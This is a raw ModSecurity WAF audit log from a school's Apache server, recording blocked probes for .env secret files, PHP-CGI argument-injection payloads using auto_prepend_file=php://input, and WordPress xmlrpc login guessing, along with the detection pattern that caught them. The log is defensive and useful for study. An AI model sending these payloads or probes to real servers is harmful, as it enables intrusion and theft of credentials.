[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744722123171335 5051 (- - -) Stopwatch2: 1744722123171335 5051; combined=3128, p1=508, p2=2587, p3=0, p4=0, p5=32, sr=75, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a09470f-Z-- --b1fbe65f-A-- [15/Apr/2025:20:22:04 +0700] Z_5dfKXLWI2MDahumW9-wwAAAMo 103.236.140.4 42282 103.236.140.4 8181 --b1fbe65f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.14) Gecko/20110218 AlexaToolbar/alxf-2.0 Firefox/3.6.14 Accept-Charset: utf-8 --b1fbe65f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1fbe65f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744723324751544 805 (- - -) Stopwatch2: 1744723324751544 805; combined=333, p1=292, p2=0, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1fbe65f-Z-- --6112cd37-A-- [15/Apr/2025:22:44:18 +0700] Z_5-0iULYKh39tLgM0CTNAAAAEs 103.236.140.4 43408 103.236.140.4 8181 --6112cd37-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; ko-kr) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 --6112cd37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6112cd37-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744731858950945 886 (- - -) Stopwatch2: 1744731858950945 886; combined=371, p1=328, p2=0, p3=0, p4=0, p5=43, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6112cd37-Z-- --525e0623-A-- [15/Apr/2025:22:58:00 +0700] Z_6CCKXLWI2MDahumW9_JgAAANU 103.236.140.4 43566 103.236.140.4 8181 --525e0623-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 37.114.63.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.114.63.53 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --525e0623-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --525e0623-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744732680393718 956 (- - -) Stopwatch2: 1744732680393718 956; combined=378, p1=338, p2=0, p3=0, p4=0, p5=40, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --525e0623-Z-- --3874f16c-A-- [15/Apr/2025:23:03:27 +0700] Z_6DTyULYKh39tLgM0CTXgAAAEM 103.236.140.4 43600 103.236.140.4 8181 --3874f16c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ELE-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --3874f16c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3874f16c-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744733007058296 822 (- - -) Stopwatch2: 1744733007058296 822; combined=325, p1=284, p2=0, p3=0, p4=0, p5=41, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3874f16c-Z-- --b6d6fe77-A-- [15/Apr/2025:23:36:12 +0700] Z_6K_KXLWI2MDahumW9_OQAAAMM 103.236.140.4 43804 103.236.140.4 8181 --b6d6fe77-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --b6d6fe77-C-- --b6d6fe77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6d6fe77-E-- --b6d6fe77-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744734972504349 4751 (- - -) Stopwatch2: 1744734972504349 4751; combined=2940, p1=544, p2=2366, p3=0, p4=0, p5=30, sr=132, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6d6fe77-Z-- --0e61b20e-A-- [15/Apr/2025:23:56:54 +0700] Z_6P1iULYKh39tLgM0CTdwAAAFY 103.236.140.4 43860 103.236.140.4 8181 --0e61b20e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0e61b20e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e61b20e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744736214825167 825 (- - -) Stopwatch2: 1744736214825167 825; combined=358, p1=317, p2=0, p3=0, p4=0, p5=40, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e61b20e-Z-- --388d5a42-A-- [15/Apr/2025:23:56:58 +0700] Z_6P2qXLWI2MDahumW9_PwAAANM 103.236.140.4 43864 103.236.140.4 8181 --388d5a42-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --388d5a42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --388d5a42-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744736218865069 839 (- - -) Stopwatch2: 1744736218865069 839; combined=362, p1=320, p2=0, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --388d5a42-Z-- --b491fb6c-A-- [16/Apr/2025:00:22:58 +0700] Z_6V8s-f7AifS1fst96C-gAAAAQ 103.236.140.4 44096 103.236.140.4 8181 --b491fb6c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.3; ko-kr; SHW-M250S Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Accept-Charset: utf-8 --b491fb6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b491fb6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744737778806102 896 (- - -) Stopwatch2: 1744737778806102 896; combined=403, p1=362, p2=0, p3=0, p4=0, p5=40, sr=126, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b491fb6c-Z-- --8c59c10b-A-- [16/Apr/2025:00:27:51 +0700] Z_6XF8-f7AifS1fst96C-wAAABc 103.236.140.4 44098 103.236.140.4 8181 --8c59c10b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 OPR/62.0.3331.116 Accept-Charset: utf-8 --8c59c10b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c59c10b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744738071691929 844 (- - -) Stopwatch2: 1744738071691929 844; combined=352, p1=311, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c59c10b-Z-- --92fded76-A-- [16/Apr/2025:01:01:06 +0700] Z_6e4s-f7AifS1fst96DQgAAAA4 103.236.140.4 45112 103.236.140.4 8181 --92fded76-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.198.4.146 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.198.4.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --92fded76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92fded76-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744740066547828 875 (- - -) Stopwatch2: 1744740066547828 875; combined=375, p1=336, p2=0, p3=0, p4=0, p5=39, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92fded76-Z-- --c5bdf07a-A-- [16/Apr/2025:01:51:35 +0700] Z_6qt81f8LoF-Pq3UL4VpQAAAJY 103.236.140.4 45276 103.236.140.4 8181 --c5bdf07a-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 116.198.231.35 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 116.198.231.35 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --c5bdf07a-C-- --c5bdf07a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5bdf07a-E-- --c5bdf07a-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744743095209599 4678 (- - -) Stopwatch2: 1744743095209599 4678; combined=3085, p1=473, p2=2581, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5bdf07a-Z-- --40240255-A-- [16/Apr/2025:07:30:47 +0700] Z_76Nxk9XPLR9cFiTEu7FwAAABc 103.236.140.4 49278 103.236.140.4 8181 --40240255-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.135.193.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.135.193.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3 Accept-Charset: utf-8 --40240255-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40240255-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744763447866956 877 (- - -) Stopwatch2: 1744763447866956 877; combined=368, p1=326, p2=0, p3=0, p4=0, p5=42, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40240255-Z-- --c445d810-A-- [16/Apr/2025:07:50:18 +0700] Z_7-yk-sESiKFppgz04V4AAAAMg 103.236.140.4 49430 103.236.140.4 8181 --c445d810-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.151.123.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.151.123.101 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --c445d810-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c445d810-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744764618904517 696 (- - -) Stopwatch2: 1744764618904517 696; combined=266, p1=231, p2=0, p3=0, p4=0, p5=35, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c445d810-Z-- --56d2e44a-A-- [16/Apr/2025:07:50:35 +0700] Z_7-2ype92T0H9-Aa0y15gAAAEU 103.236.140.4 49434 103.236.140.4 8181 --56d2e44a-B-- GET /sendgrid/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.151.123.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.151.123.101 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --56d2e44a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56d2e44a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744764635564321 12750 (- - -) Stopwatch2: 1744764635564321 12750; combined=24155, p1=271, p2=0, p3=0, p4=0, p5=11961, sr=74, sw=0, l=0, gc=11923 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56d2e44a-Z-- --a84a3d3e-A-- [16/Apr/2025:09:13:45 +0700] Z_8SWSpe92T0H9-Aa0y2AwAAAE4 103.236.140.4 50510 103.236.140.4 8181 --a84a3d3e-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.141.38 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.141.38 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.25.1 Accept: */* Content-Type: application/x-www-form-urlencoded --a84a3d3e-C-- --a84a3d3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a84a3d3e-E-- --a84a3d3e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744769625528436 5043 (- - -) Stopwatch2: 1744769625528436 5043; combined=3020, p1=534, p2=2453, p3=0, p4=0, p5=32, sr=79, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a84a3d3e-Z-- --3461d16f-A-- [16/Apr/2025:09:38:22 +0700] Z_8YHipe92T0H9-Aa0y2DgAAAEg 103.236.140.4 50710 103.236.140.4 8181 --3461d16f-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 194.163.182.227 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Cookie: X-Forwarded-For: 194.163.182.227 Accept-Encoding: gzip X-Varnish: 126626352 --3461d16f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3461d16f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744771102246237 911 (- - -) Stopwatch2: 1744771102246237 911; combined=347, p1=305, p2=0, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3461d16f-Z-- --54128e26-A-- [16/Apr/2025:11:00:55 +0700] Z_8rdype92T0H9-Aa0y2VgAAAFU 103.236.140.4 51384 103.236.140.4 8181 --54128e26-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --54128e26-C-- wp.getUsersBlogs admin 123456789 --54128e26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54128e26-E-- --54128e26-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776055268505 4500 (- - -) Stopwatch2: 1744776055268505 4500; combined=3415, p1=391, p2=2780, p3=0, p4=0, p5=140, sr=118, sw=104, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54128e26-Z-- --707c036e-A-- [16/Apr/2025:11:01:55 +0700] Z_8rsype92T0H9-Aa0y2kwAAAEw 103.236.140.4 51704 103.236.140.4 8181 --707c036e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http 